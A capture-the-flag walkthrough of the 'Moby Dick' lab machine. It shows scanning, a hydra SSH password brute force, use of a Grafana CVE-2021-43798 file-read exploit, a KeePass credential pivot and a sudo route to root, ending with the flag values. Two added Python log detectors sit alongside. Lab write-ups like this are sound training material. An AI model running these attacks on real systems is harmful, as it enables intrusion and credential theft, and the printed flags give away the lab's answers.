TheHackersLabs: Moby Dick Machine Walkthrough (WP)
城南花已开 Lv5

Information Gathering

Service Enumeration

sudo arp-scan -l
[sudo] password for ctf:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.138 08:00:27:5f:2c:af (Unknown)
192.168.60.254 00:50:56:fd:82:05 (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.970 seconds (129.95 hosts/sec). 4 responded
export ip=192.168.60.138
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: allowing you to send UDP packets into the void 1200x faster than NMAP

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.138:22
Open 192.168.60.138:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-04 20:35 CST
Initiating ARP Ping Scan at 20:35
Scanning 192.168.60.138 [1 port]
Completed ARP Ping Scan at 20:35, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:35
Completed Parallel DNS resolution of 1 host. at 20:35, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:35
Scanning 192.168.60.138 [2 ports]
Discovered open port 22/tcp on 192.168.60.138
Discovered open port 80/tcp on 192.168.60.138
Completed SYN Stealth Scan at 20:35, 0.04s elapsed (2 total ports)
Nmap scan report for 192.168.60.138
Host is up, received arp-response (0.00065s latency).
Scanned at 2025-01-04 20:35:06 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:5F:2C:AF (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Port 80 only serves the default Apache page.

Let's try a directory scan.

It finds /penguin.php.

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.138
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 10671]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/penguin.php (Status: 200) [Size: 89]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

User privilege escalation

It gives a small hint:

[image]

Nothing else turned up, so this hint is the only way in.

The translation is a bit off: the "little penguin" should be a username (pinguinito, as used below).

Let's try brute-forcing it with hydra.

❯ hydra -l pinguinito -P /usr/share/seclists/Passwords/richelieu-french-top5000.txt ssh://192.168.60.138
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-04 21:00:49
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 5000 login tries (l:1/p:5000), ~313 tries per task
[DATA] attacking ssh://192.168.60.138:22/
[STATUS] 269.00 tries/min, 269 tries in 00:01h, 4736 to do in 00:18h, 11 active
[STATUS] 174.00 tries/min, 522 tries in 00:03h, 4484 to do in 00:26h, 10 active
[22][ssh] host: 192.168.60.138 login: pinguinito password: love
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 6 final worker threads did not complete until end.
[ERROR] 6 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-01-04 21:03:52
~
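As an added defender-side example (not part of the original writeup), here is a small Python detector that spots a password-guessing burst like the hydra run above in sshd auth.log lines: it counts failed logins per source IP inside a sliding window and records whether a successful login followed. The log lines are constructed, and the threshold, window and year are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd auth.log lines (not taken from the target); the burst at
# 21:00 mimics what a wordlist run like the hydra command above leaves behind.
SAMPLE_AUTH_LOG = """\
Jan  4 21:00:49 ballenasio sshd[1201]: Failed password for pinguinito from 192.168.60.100 port 51230 ssh2
Jan  4 21:00:49 ballenasio sshd[1202]: Failed password for pinguinito from 192.168.60.100 port 51231 ssh2
Jan  4 21:00:50 ballenasio sshd[1203]: Failed password for pinguinito from 192.168.60.100 port 51232 ssh2
Jan  4 21:00:50 ballenasio sshd[1204]: Failed password for invalid user admin from 192.168.60.100 port 51233 ssh2
Jan  4 21:00:51 ballenasio sshd[1205]: Failed password for pinguinito from 192.168.60.100 port 51234 ssh2
Jan  4 21:00:52 ballenasio sshd[1206]: Failed password for pinguinito from 192.168.60.100 port 51235 ssh2
Jan  4 21:03:52 ballenasio sshd[1300]: Accepted password for pinguinito from 192.168.60.100 port 51900 ssh2
Jan  4 21:10:00 ballenasio sshd[1400]: Failed password for root from 192.168.60.1 port 40000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2$"
)

def detect_bruteforce(log_text, threshold=5, window_seconds=60, year=2025):
    """Map source IP -> (max failed logins inside one sliding window, whether a
    successful login followed the failures) for every source over threshold."""
    failures, successes = defaultdict(list), defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unrelated syslog lines
        when = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        (failures if m["result"] == "Failed" else successes)[m["ip"]].append(when)

    alerts = {}
    for ip, times in failures.items():
        times.sort()
        start, best = 0, 0
        for end in range(len(times)):
            # slide the left edge until the window spans <= window_seconds
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            succeeded = any(s >= times[0] for s in successes.get(ip, []))
            alerts[ip] = (best, succeeded)
    return alerts
```

A hit whose second field is True is the case to triage first, since the guessing evidently worked.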

Got the password; connect over SSH.

There is a kdbx file; download it to the local machine.

❯ pwncat-cs pinguinito@192.168.60.138
[21:06:18] Welcome to pwncat 🐈! __main__.py:164
Password: ****
[21:06:21] 192.168.60.138:22: registered new host w/ db manager.py:957
(local) pwncat$
(remote) pinguinito@ballenasio:/home/pinguinito$ ls
Database.kdbx user.txt
(remote) pinguinito@ballenasio:/home/pinguinito$
(local) pwncat$ download Database.kdbx
Database.kdbx ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 2.4/2.4 KB • ? • 0:00:00
[21:06:31] downloaded 2.35KiB in 0.07 seconds

Tried cracking it, but nothing came out after a long time.

But recalling the earlier hint, there is a service running in Docker.

[image]

As an ordinary user, though, we have no permission to use Docker.

Let's try reaching the default Docker container IP directly.

(remote) pinguinito@ballenasio:/tmp$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 1000
link/ether 08:00:27:5f:2c:af brd ff:ff:ff:ff:ff:ff
inet 192.168.60.138/24 metric 100 brd 192.168.60.255 scope global dynamic enp0s3
valid_lft 1550sec preferred_lft 1550sec
inet6 fe80::a00:27ff:fe5f:2caf/64 scope link
valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:3e:04:c4:53 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
inet6 fe80::42:3eff:fe04:c453/64 scope link
valid_lft forever preferred_lft forever
5: vethf50fec3@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
link/ether 0e:92:ac:a2:14:64 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::c92:acff:fea2:1464/64 scope link
valid_lft forever preferred_lft forever
(remote) pinguinito@ballenasio:/tmp$ curl 172.17.0.2:3000
<a href="/login">Found</a>.

A response comes back, which confirms the guess.

Exploitation

This version of Grafana has a file read vulnerability.

Let's exploit it.

❯ searchsploit grafana
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
Grafana 7.0.1 - Denial of Service (PoC) | linux/dos/48638.sh
Grafana 8.3.0 - Directory Traversal and Arbitrary File Read | multiple/webapps/50581.py
Grafana <=6.2.4 - HTML Injection | typescript/webapps/51073.txt
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
❯ searchsploit -m multiple/webapps/50581.py
Exploit: Grafana 8.3.0 - Directory Traversal and Arbitrary File Read
URL: https://www.exploit-db.com/exploits/50581
Path: /usr/share/exploitdb/exploits/multiple/webapps/50581.py
Codes: CVE-2021-43798
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/ctf/50581.py
-------------------------------------
(local) pwncat$ upload 50581.py
./50581.py ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 2.8/2.8 KB • ? • 0:00:00
[21:40:02] uploaded 2.76KiB in 0.13 seconds upload.py:76
(local) pwncat$
(remote) pinguinito@ballenasio:/tmp$ python3 50581.py -H http://172.17.0.2:3000
Read file > /tmp/database_pass.txt
supermegastrongpasswordpenguin

Read file >
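As an added defender-side example (not part of the original writeup), a small Python detector that flags CVE-2021-43798-style requests in web access logs: Grafana's affected endpoint is /public/plugins/<plugin-id>/, so the check percent-decodes each request path and walks its segments to see whether it climbs above that directory. The log lines, plugin name and timestamps are constructed.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (not from the writeup's target); the 3rd mirrors
# the file read shown above, the 4th and 5th use encoded traversal sequences.
SAMPLE_ACCESS_LOG = """\
172.17.0.1 - - [04/Jan/2025:21:40:10 +0800] "GET /login HTTP/1.1" 200 8023
172.17.0.1 - - [04/Jan/2025:21:40:11 +0800] "GET /public/plugins/alertlist/module.js HTTP/1.1" 200 1500
172.17.0.1 - - [04/Jan/2025:21:40:12 +0800] "GET /public/plugins/alertlist/../../../../../../../../tmp/database_pass.txt HTTP/1.1" 200 31
172.17.0.1 - - [04/Jan/2025:21:40:13 +0800] "GET /public/plugins/alertlist/..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1" 200 1400
172.17.0.1 - - [04/Jan/2025:21:40:14 +0800] "GET /public/plugins/alertlist/%252e%252e/%252e%252e/etc/grafana/grafana.ini HTTP/1.1" 200 900
"""

REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')
PLUGIN_PREFIX = "/public/plugins/"

def normalize(path, rounds=3):
    """Percent-decode repeatedly (catches %252e double encoding), drop any query."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.split("?", 1)[0]

def escapes_plugin_dir(path):
    """True when a /public/plugins/... request climbs above /public/plugins/
    (the CVE-2021-43798 shape); 'sub/../file' inside a plugin is not flagged."""
    p = normalize(path)
    if not p.startswith(PLUGIN_PREFIX):
        return False
    depth = 0  # directory depth relative to /public/plugins/
    for seg in p[len(PLUGIN_PREFIX):].split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False

def find_traversal(log_text):
    """Return (line_number, decoded_path) for each request that escapes."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = REQ_RE.search(line)
        if m and escapes_plugin_dir(m["path"]):
            hits.append((n, normalize(m["path"])))
    return hits
```

Because the decision is made on the decoded, segment-walked path rather than on a literal "../" substring, encoded variants are caught and ordinary plugin asset requests stay quiet.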

Root privilege escalation

With the file's password in hand, open the kdbx file on an online platform.

[image]

It yields a new account and password: ballenasio / secureballenasio.

Switch to that user locally.

That gives root straight away, two birds with one stone.

(remote) pinguinito@ballenasio:/home/pinguinito$ su ballenasio
Password:
ballenasio@ballenasio:/home/pinguinito$ cd ~
ballenasio@ballenasio:~$ ls -al
total 36
drwxr-x--- 5 ballenasio ballenasio 4096 mar 12 2024 .
drwxr-xr-x 4 root root 4096 mar 12 2024 ..
-rw------- 1 ballenasio ballenasio 3758 abr 16 2024 .bash_history
-rw-r--r-- 1 ballenasio ballenasio 220 ene 6 2022 .bash_logout
-rw-r--r-- 1 ballenasio ballenasio 3771 ene 6 2022 .bashrc
drwx------ 2 ballenasio ballenasio 4096 mar 12 2024 .cache
drwxrwxr-x 3 ballenasio ballenasio 4096 mar 12 2024 .local
-rw-r--r-- 1 ballenasio ballenasio 807 ene 6 2022 .profile
drwx------ 2 ballenasio ballenasio 4096 abr 16 2024 .ssh
-rw-r--r-- 1 ballenasio ballenasio 0 mar 12 2024 .sudo_as_admin_successful
ballenasio@ballenasio:~$ sudo -l
[sudo] password for ballenasio:
Matching Defaults entries for ballenasio on ballenasio:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User ballenasio may run the following commands on ballenasio:
(ALL : ALL) ALL
ballenasio@ballenasio:~$ sudo su
root@ballenasio:/home/ballenasio# id
uid=0(root) gid=0(root) groups=0(root)
root@ballenasio:/home/ballenasio# cat /home/pinguinito/user.txt
84fb7c56943975d59d0ca2a8b085c7c2
root@ballenasio:/home/ballenasio# cat /root/root.txt
c616825bdc384507ab0566be8d00cdf8